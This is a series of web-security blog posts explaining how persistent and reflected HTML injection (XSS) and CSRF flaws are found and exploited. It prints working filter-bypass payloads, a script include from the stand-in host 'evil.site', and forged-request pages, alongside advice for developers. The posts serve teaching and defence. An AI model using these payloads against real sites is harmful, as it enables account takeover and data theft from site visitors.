The Wrong Location for a Locale

Web sites that wish to appeal to broad audiences use internationalization techniques that enable content and labeling to be substituted based on a user’s language preferences without having to modify layout or functionality. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

Unicode and character encoding like UTF-8 were designed to enable applications to represent the written symbols for these languages. (No one creates web sites to support parseltongue because snakes can’t use keyboards and they always eat the mouse. But that still doesn’t seem fair; they’re pretty good at swipe gestures.)Namárië

A site’s written language conveys utility and worth to its visitors. A site’s programming language gives headaches and stress to its developers. Developers prefer to explain why their programming language is superior to others. Developers prefer not to explain why they always end up creating HTML injection vulnerabilities with their superior language.

Several previous posts have shown how HTML injection attacks are reflected from a URL parameter in a web page, or even how the URL fragment — which doesn’t make a round trip to the web site — isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, the payload having been stored somewhere for later retrieval, such as being associated with a user’s session by a tracking cookie.

And sometimes the attack exists and persists in the cookie itself.

Here’s a site that keeps a locale parameter in the URL, right where we like to test for vulns like XSS.

http://web.site/page.do?locale=en_US

There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:

http://web.site/page.do?locale=en_US%22%3E%3Cscript%3Ealert%289%29%3C/script%3E

No reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

<input type="hidden" name="_locale" value="en_US">

Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How inhibiting of them.

Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.

http://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%3Ealert(9)%3C/script%3E%0A%0D

The catch is that some key characters in the hack have been rendered into an HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body> :

<body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&# 034;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

">

And the title attribute of a <span>:

<span class="ex-language-select-indicator ex-flag-US" title="US&# 034;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

"></span>

And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

<input type="hidden" name="_locale" value="en_US&quot;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

" id="currentLocale" />

We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages. With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag of the following example, we seem to have messed up an xml:lang attribute so much that the payload appears twice:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">

<script>alert(9)</script>

" xml:lang="en-US">

<script>alert(9)</script>

">
<head>

And something we hadn’t seen before on this site, a reflection inside a JavaScript variable near the bottom of the <body> element. (HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

<!--  Include the Reference Page Tag script -->
<!--//BEGIN REFERENCE PAGE TAG SCRIPT-->
<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US"&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

';
</script>

Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:

http://web.site/page.do?locale=en_US”>%0A%0D’;alert(9)//

Too bad the apostrophe character (‘) remains encoded:

<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US&# 034;&gt;

&# 039;;alert(9)//';
</script>

That countermeasure shouldn’t stop us. This site’s developers took the time to write some vulnerable code. The least we can do is spend the effort to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

http://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%20src=%22http://evil.site/%22%3E%3C/script%3E%0A%0D

As expected, the page.do’s response contains the HTML encoded version of the payload. We lose quotes (some of which are actually superfluous for this payload).

<body id="lang-en" class="tier-level-one cntry-US&# 034;&gt;

&lt;script src=&# 034;http://evil.site/&# 034;&gt;&lt;/script&gt;

">

But if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by evil.site.

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">

<script src="http://evil.site/"></script>

" xml:lang="en-US">

<script src="http://evil.site/"></script>

">
<head>

Yé! utúvienyes! Done and exploited. But what was the complete mechanism? The GET request to the contact page didn’t contain the payload — it’s just

http://web.site/contactUs.do

So, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

Cookie: v1st=601F242A7B5ED42A;
        JSESSIONID=CF44DA19A31EA7F39E14BB27D4D9772F;
        sessionLocale="en_US\">  <script src=\"http://evil.site/\"></script>  ";
        exScreenRes=done

Sometime between the request to page.do and the contact page the site decided to take the locale parameter from page.do and place it in a cookie. Then, the site took the cookie presented in the request to the contact page, wrote it into the HTML (on the server side, not via client-side JavaScript), and let the user specify a custom locale. The locale isn’t as picturesque as Hogwarts, nor as destitute as District 12, but Hermione and Katniss would rip apart a vuln like this.Hermione's Exam Schedule

Insistently Marketing Persistent XSS

Want to make your site secure? Write secure code. Want to make it less secure? Add someone else’s code to it. Even better, do it in the “cloud.”

The last few HTML injection articles here demonstrated the reflected variant of the attack. The exploit appears within the immediate response to the request that contains the XSS payload. These kinds of attacks are also ephemeral because the exploit disappears once the victim browses away from the infected page. The attack must be re-delivered for every visit to the vulnerable page.

A persistent HTML injection is more insidious. The web site still reflects the payload into a page, but not necessarily in the immediate response to the request that delivered the payload. You have to find the payload, e.g. the friendly alert(), in some other area of the app. In many cases the payload only needs to be delivered once. Any subsequent visit to the page where it’s reflected exposes the visitor to the exploit. This is very dangerous when the page has a one-to-many relationship where one attacker infects the page and many users visit the page via normal “safe” links that don’t have an XSS payload.

Persistence comes in many guises and durations. Here’s one that associates the persistence with a cookie.

Our example of the day decided to track users for marketing and advertising purposes. There’s little reason to love user tracking (unless 95% of your revenue comes from it), but you might like it a little more if you could use it for HTML injection.

The hack starts off like any other reflected XSS test. Another day, another alert:

http://web.site/page.aspx?om=alert(9)

But the response contains nothing interesting. It didn’t reflect any piece of the payload, not even in an HTML encoded or stripped version. And — spoiler alert — not in the following script block:

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop4="quote";
s.events="event2";
s.pageName="quote1";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

But we’re not at the point of nothing ventured, nothing gained. We’re just at the point of nothing reflected, something might still be wrong.

So we poke around at some more links on the site. Just visiting them as any user might without injecting any new payloads, working under the assumption that the payload could have found a persistent lair to curl up in and wait for an unsuspecting victim.

Sure enough we find a reflection in an (apparently) unrelated link. Note that the payload has already been delivered. This request has no indicators of XSS:

http://web.site/wacky/archives/2012/cute_animal.aspx

We find the alert() nested inside a JavaScript variable where, sadly, it remains innocuous and unexploited. For reasons we don’t care about, a comment warns us not to ALTER ANYTHING BELOW THIS LINE!

You don’t have to shout. We’ll just alter things above the line.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop17="alert(9)";
s.pageName="ar_2012_cute_animal";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

There are plenty of fun ways to inject into JavaScript string concatenation. We’ll stick with the most obvious plus (+) operator. To do this we need to return to the original injection point and alter the payload (just don’t touch ANYTHING BELOW THIS LINE!).

http://web.site/page.aspx?om=”%2balert(9)%2b”

We head back to the cute_animal.aspx page to see how the payload fared. Before we can click to Show Page Source we’re greeted with that happy hacker greeting, the friendly alert() window.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop17=""+alert(9)+"";
s.pageName="ar_2012_cute_animal";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

After experimenting with a few variations on the request to the reflection point (the cute_animal.aspx page) we narrow the persistent carrier to a cookie value. The cookie is a long string of hexadecimal digits whose length and content does not change between requests. This is a good hint that it’s some sort of UUID that points to a record in a data store that contains the XSS payload from the om variable. (The cookie’s unchanging nature implies that the payload is not inserted into the cookie, encrypted or otherwise.) Get rid of the cookie and the alert no longer appears.

The cause appears to be string concatenation where the s.prop17 variable is assigned a value associated with the cookie. It’s a common, basic, insecure design pattern.

So, we have a persistent HTML injection tied to a user-tracking cookie. A diminishing factor in this vuln’s risk is that the effect is limited to individual visitors. It’d be nice it we could recommend getting rid of user tracking as the security solution, but the real issue is applying good software engineering practices when inserting client-side data into HTML. But we’re not done with user tracking yet. There’s this concept called privacy…

But that’s a story for another day.

Plugins Stand Out

A minor theme in my recent B-Sides SF presentation was the stagnancy of innovation since HTML4 was finalized in December 1999. New programming patterns emerged over that time, only to be hobbled by the outmoded spec. To help recall that era I scoured archive.org for ancient curiosities of the last millennium. (Like Geocities’ announcement of 2MB of free hosting space.) One item I came across was a Netscape advisory regarding a Java bytecode vulnerability — in March 1996.

March 1996 Java Bytecode Vulnerability

Almost twenty years later Java still plagues browsers with continuous critical patches released month after month after month, including March 2013.

Java: Write none, uninstall everywhere.

The primary complaint against browser plugins is not their legacy of security problems (the list of which is exhausting to read). Nor that Java is the only plugin to pick on. Flash has its own history of releasing nothing but critical updates. The greater issue is that even a secure plugin lives outside the browser’s Same Origin Policy (SOP).

When plugins exist outside the security and privacy controls enforced by browsers they weaken the browsing experience. It’s true that plugins aren’t completely independent of these controls, their instantiation and usage with regard to the DOM still falls under the purview of SOP. However, the ways that plugins extend a browser (such as network and file access) are rife with security and privacy pitfalls.

For one example, Flash’s Local Storage Object (LSO) was easily abused as an “evercookie” because it was unaffected by clearing browser cookies and even how browsers decided to accept cookies or not. Yes, it’s still possible to abuse HTTP and HTML to establish evercookies. Even the lauded HTML5 Local Storage API could be abused in a similar manner. It’s for reasons like these that we should be as diligent about demanding “privacy patches” as much as we demand security fixes.

Unlike Flash, an HTML5 API like Local Storage is an open standard created by groups who review and balance the usability, security, and privacy implications of features designed to improve the browsing experience. Establishing a feature like Local Storage in the HTML spec and aligning it with similar concepts like cookies and security controls like SOP (or HTML5 features like CORS, CSP, etc.) makes them a superior implementation in terms of integrating with users’ expectations and browser behavior. Instead of one vendor providing a means to extend a browser, browser vendors (the number of which is admittedly dwindling) are competing with each other to implement a uniform standard.

Sure, HTML5 brings new risks and preserves old vulnerabilities in new and interesting ways, but a large responsibility for those weaknesses lies with developers who would misuse an HTML5 feature in the same way they might have misused XHR and JSONP in the past. Maybe we’ll start finding plaintext passwords in Local Storage objects, or more sophisticated XSS exploits using Web Workers and WebSockets to scour data from a compromised browser. Security ignorance takes a long time to fix. And even experienced developers are challenged by maintaining the security of complex web applications.

HTML5 promises to obviate plugins altogether. We’ll have markup to handle video, drawing, sound, more events, and more features to create engaging games and apps. Browsers will compete on the implementation and security of these features rather than be crippled by the presence of plugins out of their control.

Getting rid of plugins makes our browsers more secure, but adopting HTML5 doesn’t imply browsers and web sites become secure. There are still vulnerabilities that we can’t fix by simple application design choices like including X-Frame-Options or adopting Content Security Policy headers.

Exterminate!

It’ll be a long time before everyone’s comfortable with the Dirty Harry test. Would you click on an unknown link — better yet, scan an inscrutable QR code — with your current browser? Would you still do it with multiple tabs open to your email, bank, and social networking accounts?

Who cares if “the network is the computer” or an application lives in the “cloud” or it’s offered via something as a service? It’s your browser that’s the door to web apps and when it’s not secure, an open window to your data.

RSA US 2013, ASEC-F41 Slides

Here are the slides for my presentation, Using HTML5 WebSockets Securely, at this year’s RSA US conference in San Francisco.

It’s a continuation of the content created for last year’s BlackHat and BayThreat presentations. RSA wants slides to be in a specific template. So, these slides are less visually stimulating than I usually have the freedom to create. (RSA demands an “Apply” slide at the end. Otherwise they don’t know if you told attendees how to apply what you were talking about for the last 45 minutes.) Still, the slides should convey some useful concepts for understanding and working with WebSockets.

This is hardly the end for this topic. But there’s a long list of other material that I need to finish before this protocol gets more attention.

Condign Punishment

The article rate here slowed down in February due to my preparation for B-Sides SF and RSA 2013. I even had to give a brief presentation about Hacking Web Apps at my company’s booth. (Followed by a successful book signing. Thank you!)

In that presentation I riffed off several topics repeated throughout this site. One topic was the mass hysteria we are forced to suffer from web sites that refuse to write safe SQL statements.

Those of you who are developers may already be familiar with a SQL-related API, though some may not be aware that the acronym stands for Advanced Persistent Ignorance.

Here’s a slide I used in the presentation (slide 13 of 29). Since I didn’t have enough time to complete nine years of research I left blanks for the audience to fill in.

Advanced Persistent Ignorance

Now you can fill in the last line. Security company Bit9 admitted last week to a compromise that was led by a SQL injection exploit. Sigh. The good news was that no massive database of usernames and passwords (hashed or not) went walkabout. The bad news was that attackers were able to digitally sign malware with a stolen Bit9 code-signing certificates.

I don’t know what I’ll add as a fill-in-the-blank for 2014. Maybe an entry for NoSQL. After all, developers love to reuse an API. String concatenation in JavaScript is no better that doing the same for SQL.

If we can’t learn from PHP’s history in this millennium, perhaps we can look further back for more fundamental lessons. The Greek historian Polybius noted how Romans protected passwords (watchwords) in his work, Histories1:

To secure the passing round of the watchword for the night the following course is followed. One man is selected from the tenth maniple, which, in the case both of cavalry and infantry, is quartered at the ends of the road between the tents; this man is relieved from guard-duty and appears each day about sunset at the tent of the Tribune on duty, takes the tessera or wooden tablet on which the watchword is inscribed, and returns to his own maniple and delivers the wooden tablet and watchword in the presence of witnesses to the chief officer of the maniple next his own; he in the same way to the officer of the next, and so on, until it arrives at the first maniple stationed next the Tribunes. These men are obliged to deliver the tablet (tessera) to the Tribunes before dark.

More importantly, the Romans included a consequence for violating the security of this process:

If they are all handed in, the Tribune knows that the watchword has been delivered to all, and has passed through all the ranks back to his hands: but if any one is missing, he at once investigates the matter; for he knows by the marks on the tablets from which division of the army the tablet has not appeared; and the man who is discovered to be responsible for its non-appearance is visited with condign punishment.

We truly need a fitting penalty for SQL injection vulnerabilities; perhaps only tempered by the judicious use of salted, hashed passwords.

=====
1 Polybius, Histories, trans. Evelyn S. Shuckburgh (London, New York: Macmillan, 1889), Perseus Digital Library. http://data.perseus.org/citations/urn:cts:greekLit:tlg0543.tlg001.perseus-eng1:6.34 (accessed March 5, 2013).

B-Sides SF 2013: JavaScript Security & HTML5

I’ve emerged from the gloomy dungeon of C++ and book writing long enough to venture into the gloomy dungeon of the DNA Lounge for B-Sides San Francisco. It’s the perfect venue to talk about the building blocks of web apps: the twin strands of JavaScript and HTML5.

As noted at the end of my talk, I remained true to form and finished the slides only about an hour before the presentation began. (A delay compounded by the negative effects of a brain-oozing cold. If an undead plague starts in SF; you can thank me for being patient zero — we’ll see whether my reanimation goes the route of Romero or Boyle.)

Anyway, now you can view the slides here. As always, they lack context, subtext, and outright text without the benefit of narration. I’ll expand on them in follow-up posts over the coming month. That is, once I finish the slides for another presentation this Friday.

Implicit HTML, Explicit Injection

When designing security filters against HTML injection you need to outsmart the attacker, not the browser. HTML’s syntax is more forgiving of mis-nested tags, unterminated elements, and entity-encoding compared to formats like XML. This is a good thing, because it ensures a User-Agent renders a best-effort layout for a web page rather than bailing on errors or typos that would leave visitors staring at blank pages or incomprehensible error messages.

It’s also a bad thing, because User-Agents have to make educated guesses about a page author’s intent when it encounters unexpected markup. This is the kind of situation that leads to browser quirks and inconsistent behavior.

One of HTML5′s improvements is a codified algorithm for parsing content. In the past, browsers not only had quirks, but developers would write content specifically to take advantage of those idiosyncrasies — giving us a world where sites worked well with one and only one version of Internet Explorer (or Mozilla, etc.). A great deal of blame lays at the feet of site developers who refused to consider good HTML design patterns in favor of the principle of Code Relying on Advanced Persistent Stubbornness.

Parsing Disharmony

Untidy markup is a security hazard. It makes HTML injection vulnerabilities more difficult to detect and block, especially for regex-based countermeasures.

Regular expressions have irregular success as security mechanisms for HTML. While regexes excel at pattern-matching they fare miserably in semantic parsing. Once you start building a state mechanism for element start characters, token delimiters, attribute names, and so on anything other than a narrowly-focused regex becomes unwieldy at best.

First, let’s take a look at some simple elements with uncommon syntax. Regular readers will recognize a favorite XSS payload of mine, the img tag:

<img/alt=""src="."onerror=alert(9)>

Spaces aren’t required to delimit attribute name/value pairs when the value is marked by quotes. Also, the element name may be separated from its attributes with whitespace or the forward slash. We’re entering strange parsing territory. For some sites, this will be a trip to the undiscovered country.

Delimiters are fun to play with. Here’s a case where empty quotes separate the element name from an attribute. Note the difference in value delineation. The id attribute has an unquoted value, so we separate it from the subsequent attribute with a space. The href has an empty value delimited with quotes. The parser doesn’t need whitespace after a quoted value, so we put onclick immediately after.

<a""id=a href=""onclick=alert(9)>foo</a>

User-Agents try their best to make sites work. As a consequence, they’ll interpret markup in surprising ways. Here’s an example that mixes start and end tag tokens in order to deliver an XSS payload:

<script/<a>alert(9)</script> 

We can adjust the end tag if there’s a filter watching for </script>. Note there is a space between the last </script and </a>.

<script/<a>alert(9)</script </a>

Successful HTML injection thrives on bad mark-up to bypass filters and take advantage of browser quirks. Here’s another case where the browser accepts an incorrectly terminated tag. If the site turns the following payload’s %0d%0a into \r\n (carriage return, line feed) when it places the payload into HTML, then the browser might execute the alert function.

<script%0d%0aalert(9)</script>

Or you might be able to separate the lack of closing > character from the alert function with an intermediate HTML comment:

<script%20<!--%20-->alert(9)</script>

The way browsers deal with whitespace is a notorious source of security problems. The Samy worm exploited IE’s tolerance for splitting a javascript: scheme with a line feed.

<div id=mycode style="BACKGROUND: url('java 
script:eval(document.all.mycode.expr)')" expr="alert(9)"></div>

Or we can throw an entity into the attribute list. The following is bad markup. But if it’s bad markup that bypasses a filter, then it’s a good injection.

<a href=""&amp;/onclick=alert(9)>foo</a>

HTML entities have a special place within parsing and injection attacks. They’re most often used to bypass string-matching. For example, the following three JavaScript schemes use an entity for the “s” character:

java&#115;cript:alert(9)
java&#x73;cript:alert(9)
java&#x0073;cript:alert(9)

The danger with entities and parsing is that you must keep track of the context in which you decode them. But you also need to keep track of the order in which you resolve entities (or otherwise normalize data) and when you apply security checks. In the previous example, if you had checked for “javascript” in the scheme before resolving the entity, then your filter would have failed. Think of it as a time of check to time of use (TOCTOU) problem that’s affected by data transformation rather than the more commonly thought-of race condition.

Security

User Agents are often forced to second-guess the intended layout of error-ridden pages. HTML5 brings more sanity to parsing markup. But we still don’t have a mechanism to help browsers distinguish between typos, intended behavior, and HTML injection attacks. There’s no equivalent to prepared statements for SQL.

  • Fix the vulnerability, not the exploit.
    It’s not uncommon for developers to blacklist a string like alert or javascript under the assumption that doing so prevents attacks. That sort of thinking mistakes the payload for the underlying problem. The problem is placing user-supplied data into HTML without taking steps to ensure the browser renders the data as text rather than markup.
  • Test with multiple browsers.
    A payload that takes advantage of a rendering quirk for browser A isn’t going to exhibit security problems if you’re testing with browser B.
  • Prefer parsing to regex patterns.
    Regexes may be as effective as they are complex, but you pay a price for complexity. Trying to read someone else’s regex, or even maintaining your own, becomes more error-prone as the pattern becomes longer.
  • Encode characters.
    You’ll be more successful at blocking HTML injection attacks if you consistently apply encoding rules for characters like < and > and prevent quotes from breaking attribute values.
  • Enforce rules strictly.
    Ambiguity for browsers enables them to recover from errors gracefully. Ambiguity for security weakens the system.

HTML injection attacks try to bypass filters in order to deliver a payload that a browser will render. Security filters should be strict, by not so myopic that they miss “improper” HTML constructs that a browser will happily render.

Know Your JavaScript (Injections)

HTML injection vulnerabilities make a great Voigt-Kampff test for proving you care about security. We need some kind of tool to deal with developers who take refuge in the excuse, “But it’s not exploitable.”

Companies like MasterCard and VISA created the PCI standard to make sure web sites care about vulns like XSS. Parts of the standard are pretty strict, to the point where a site faces fines or becomes unable to process credit cards if it fails to fix vulns quickly. This also means that every once in a while a site’s developers refuse to acknowledge a vuln is valid because they don’t see an alert() pop up.

The poor dears.

(1) Probe for Reflected Values

Let’s examine Exhibit One: A Means of Writing Arbitrary Mark-up into a Page. In this case, the URL parameter’s value is written into a JavaScript string variable called pageUrl. HTML injection doesn’t get much easier than this.

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27

The code now has an extra apostrophe hanging out at the end of pageUrl:

function SetLanCookie() {
  var index = document.getElementById('selectorControl').selectedIndex;
  var lcname = document.getElementById('selectorControl').options[index].value;
  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'';
  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
    var hflanguage = document.getElementById(getClientId().HfLanguage);
    hflanguage.value =  '1';
  }
  $.cookie('LanCookie', lcname, {path: '/'});
  __doPostBack('__Page_btnLanguageLink','')
}

But when the devs go to check the vuln, they show that it’s not possible to issue an alert(). For example, they update the payload with something like this:

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;alert(9)//

None of the variations on the payload seem to work. They terminated the string properly. The value gets reflected. But nothing results in JavaScript execution.

(2) Break Out of One Context, Break Another

It’s too bad our developers didn’t take the time to, you know, debug the problem. After all, HTML injection attacks are a coding exercise like any other. (Although perhaps a bit more fun.)

For starters, our payload is reflected inside a JavaScript function scope. Maybe the SetLanCookie() function just isn’t being called within the page? That would explain why the alert() never runs. A reasonable step is to close the function with a curly brace and dangle a naked alert() within the script block.

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;var%20a=%27

The following code confirms that the site still reflects the payload. However, our browser still isn’t visited by the expected pop-up.

function SetLanCookie() {
  var index = document.getElementById('selectorControl').selectedIndex;
  var lcname = document.getElementById('selectorControl').options[index].value;
  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'}alert(9);var a='';
  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
    var hflanguage = document.getElementById(getClientId().HfLanguage);
    hflanguage.value =  '1';
  }
  $.cookie('LanCookie', lcname, {path: '/'});
  __doPostBack('__Page_btnLanguageLink','')
}

But browsers have Developer Consoles and Error Consoles that print friendly messages about their activity. Taking a peek at the console output reveals why we haven’t yet succeeded in tossing up the alert() box. The script block still contains syntax errors. And unhappy syntax makes an unhappy hacker. (And a lazy one.)

[14:36:45.923] SyntaxError: function statement requires a name @ https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert(9);function(){var%20a=%27  SomePage.aspx:345

[14:42:09.681] SyntaxError: syntax error @ https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;}()alert(9);function(){var%20a=%27  SomePage.aspx:345

(3) Capture the Function Body

When we remember to terminate the JavaScript string, we must also remember to capture the syntax that follows the payload. In some cases, you can get away with escaping it with // characters. If you look at the previous code, you’ll notice that we also tried to re-capture the remainder of the string with ;var a =' inside the payload.

What needs to be done is re-capture the dangling function body. This is why you should know the JavaScript language rather than just memorize payloads. It’s not hard to fix this attack, just update the payload with an opening function statement, as below:

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;function%28%29{var%20a=%27

The page reflects the payload once again, as shown in the following code. Spaces and carriage returns have been added to make the example easier to read. They’re unnecessary in the wild (you can minify XSS payloads, too).

function SetLanCookie() {
  var index = document.getElementById('selectorControl').selectedIndex;
  var lcname = document.getElementById('selectorControl').options[index].value;
  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'
}
alert(9);
function(){
  var a='';
  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
    var hflanguage = document.getElementById(getClientId().HfLanguage);
    hflanguage.value =  '1';
  }
  $.cookie('LanCookie', lcname, {path: '/'});
  __doPostBack('__Page_btnLanguageLink','')
}

Almost there. But the pop-up remains elusive.

(4) Var Your Function

Oops. We created a function, but forgot to name it. Normally, JavaScript doesn’t care about explicit names, but it at least needs a scope for unnamed, anonymous functions. For example, the following syntax creates and executes an anonymous function that generates an alert:

(function(){alert(9)})()

We don’t need to be that fancy, but it’s nice to remember our options. In this case, we’ll assign the function to another var. Happy syntax is executing syntax. And executing syntax kills a site’s security.

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;var%20a=function%28%29{var%20a=%27

Finally, we reach a point where the payload inserts an alert() and modifies the surrounding JavaScript context so the browser has nothing to complain about. In fact, the payload is convoluted enough that it doesn’t trigger the browser’s XSS Auditor. (Which you shouldn’t be relying on, anyway. I mention it as a point of trivia.) Behold the fully exploited page, with spaces added for clarity:

function SetLanCookie() {
  var index = document.getElementById('selectorControl').selectedIndex;
  var lcname = document.getElementById('selectorControl').options[index].value;
  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'
}
alert(9);
var a = function(){
  var a ='';
  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
    var hflanguage = document.getElementById(getClientId().HfLanguage);
    hflanguage.value =  '1';
  }
  $.cookie('LanCookie', lcname, {path: '/'});
  __doPostBack('__Page_btnLanguageLink','')
}

What do you dream of? A world without HTML injection? Electric Sheep?

I wish we could have gotten rid of XSS and SQL injection long ago. I’ve written articles lamenting them. Published books about understanding them. Created scanners to find them. Yet those efforts come and go. All those moments will be lost in time, like tears in rain.

User Agent. Secret Agent. Double Agent.

We hope our browsers are secure in light of the sites we choose to visit. What we often forget, is whether we are secure in light of the sites our browsers choose to visit. Sometimes it’s hard to even figure out whose side our browsers are on.

Browsers act on our behalf, hence the term User Agent. They load HTML from the link we type in the navbar, then retrieve the resources defined in the HTML in order to fully render the site. The resources may be obvious, like images, or behind-the-scenes, like CSS that style the page’s layout or JSON messages sent by XmlHttpRequest objects.

Then there are times when our browsers work on behalf of others, working as a Secret Agent to betray our data. They carry out orders delivered by Cross-Site Request Forgery (CSRF) exploits enabled by the very nature of HTML.

Part of HTML’s success is its capability to aggregate resources from different Origins into a single page. Check out the following HTML. It loads a CSS file, JavaScript functions, and two images from different hosts, all but one over HTTPS. None of it violates the Same Origin Policy. Nor is there an issue with loading different Origins with different SSL connections.

<!doctype html>
<html>
<head>
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" media="all" type="text/css" />
<script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.0.min.js"></script>
<script>
$(document).ready(function() {
  $("#main").text("Come together...");
});
</script>
</head>
<body>
<img alt="www.baidu.com" src="http://www.baidu.com/img/shouye_b5486898c692066bd2cbaeda86d74448.gif" />
<img alt="www.twitter.com" src="https://twitter.com/images/resources/twitter-bird-blue-on-white.png" />
<div id="main" style="font-family: 'Open Sans';"></div>
</body>
</html>

CSRF attacks rely on being able to include resources from unrelated Origins in a single page. They’re not concerned with the Same Origin Policy since they are neither restricted by it nor need to break it (they don’t need to read or write across Origins). CSRF is concerned with a user’s context in relation to a web app — the data and state transitions associated with a user’s session, security, or privacy.

To get a sense of user context with regard to a site, let’s look at the Bing search engine. Click on the Preferences gear in the upper right corner to review your Search History. You’ll see a list of search terms like the following example:

Bing Search History

Bing’s Search box is an <input> field with parameter name “q“. Searching for a term — and therefore populating the Search History — is done when the form is submitted. Doing so creates a request for a link like this:

http://www.bing.com/search?q=lilith%27s+brood

For a CSRF exploit to work, it’s important to be able to recreate a user’s request. In the case of Bing, an attacker need only craft a GET request to the /search page and populate the q parameter.

Forge a Request

We’ll use a CSRF attack to populate the user’s Search History without their knowledge. This requires luring the victim to a web page that’s able to forge (as in craft) a search request. If successful, the forged (as in fake) request will affect the user’s context (i.e. the Search History). One way to forge an automatic request is via the src attribute of an img tag. The following HTML would be hosted on some Origin unrelated to Bing, e.g. http://web.site/page.

<!doctype html>
<html>
<body>
<img src="http://www.bing.com/search?q=deadliest%20web%20attacks" style="visibility: hidden;" alt="" />
</body>
</html>

The victim has to visit the attacker’s web page or come across the img tag in a discussion forum or social media site. The user does not need to have Bing open in a different browser tab or otherwise be using Bing at the same time they come across the CSRF exploit. Once their browser encounters the booby-trapped page, the request updates their Search History even though they never typed “deadliest web attacks” into the search box.

Bing Search History CSRF

As a thought experiment, extend this from a search history “infection” to a social media status update, or changing an account’s email address (to the attacker’s), or changing a password (to something the attacker knows), or any other action that affects the user’s security or privacy.

The trick is that CSRF requires full knowledge of the request’s parameters in order to successfully forge it. That kind of forgery (as in faking a legitimate request) requires another article to better explore. For example, if you had to supply the old password in order to update a new password, then you wouldn’t need a CSRF attack — just log in with the known password. Or another example, imagine Bing randomly assigned a letter to users’ search requests. One user’s request might use a “q” parameter, whereas another user’s request relies instead on an “s” parameter. If the parameter name didn’t match the one assigned to the user, then Bing would reject the search request. The attacker would have to predict the parameter name. Or, if the sample space were small, fake each possible combination — which would be only 26 letters in this imagined scenario.

Crafty Crafting

We’ll end on the easier aspect of forgery (as in crafting). Browsers automatically load resources from the src attributes of elements like img, iframe, and script (or the href attribute of a link). If an action can be faked by a GET request, that’s the easiest way to go.

HTML5 gives us another nifty way to forge requests using Content Security Policy directives. We’ll invert the expected usage of CSP by intentionally creating an element that violates a restriction. The following HTML defines a CSP rule that forbids src attributes (default-src 'none') and a URL to report rule violations. The victim’s browser must be lured to this page, either through social engineering or by placing it on a commonly-visited site that permits user-uploaded HTML.

<!doctype html>
<html>
<head>
<meta http-equiv="X-WebKit-CSP" content="default-src 'none'; report-uri http://www.bing.com/search?q=deadliest%20web%20attacks%20CSP" />
</head>
<body>
<img alt="" src="/" />
</body>
</html>

